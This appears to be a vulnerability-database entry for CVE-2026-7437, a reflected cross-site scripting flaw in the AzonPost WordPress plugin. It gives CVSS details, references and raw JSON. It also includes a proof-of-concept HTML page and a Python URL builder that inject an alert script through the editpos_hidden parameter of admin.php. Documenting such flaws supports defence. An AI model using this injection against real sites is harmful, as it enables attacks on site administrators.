Security Vulnerability Report
中文
CVE-2026-7437 CVSS 6.1 MEDIUM

CVE-2026-7437

Published: 2026-05-12 09:16:57
Last Modified: 2026-05-12 14:03:53

Description

The AzonPost plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `editpos_hidden` parameter in all versions up to, and including, 1.3. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

AzonPost <= 1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- // PoC for CVE-2026-7437 // Target: WordPress AzonPost Plugin <= 1.3 // Description: Inject script via the 'editpos_hidden' parameter --> <html> <body> <h1>CVE-2026-7437 PoC Test</h1> <p>Click the link below to trigger the XSS (Simulated):</p> <!-- Malicious URL construction --> <a href="http://target-wordpress-site/wp-admin/admin.php?page=azonpost-campaign&editpos_hidden=<script>alert('XSS');</script>"> Exploit Link </a> <!-- Python script to generate the malicious URL --> <!-- import urllib.parse payload = "<script>alert('CVE-2026-7437');</script>" base_url = "http://target-site/wp-admin/admin.php?page=azonpost-campaign" # Inject payload into the vulnerable parameter exploit_url = f"{base_url}&editpos_hidden={urllib.parse.quote(payload)}" print(f"[+] Generated Exploit URL: {exploit_url}") --> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7437", "sourceIdentifier": "[email protected]", "published": "2026-05-12T09:16:57.047", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AzonPost plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `editpos_hidden` parameter in all versions up to, and including, 1.3. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/azonpost/trunk/azonpost-campaign.php#L152", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/azonpost/trunk/azonpost-campaign.php#L396", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4b32cfa8-6e10-4f09-859e-216c94a6560c?source=cve", "source": "[email protected]"}]}}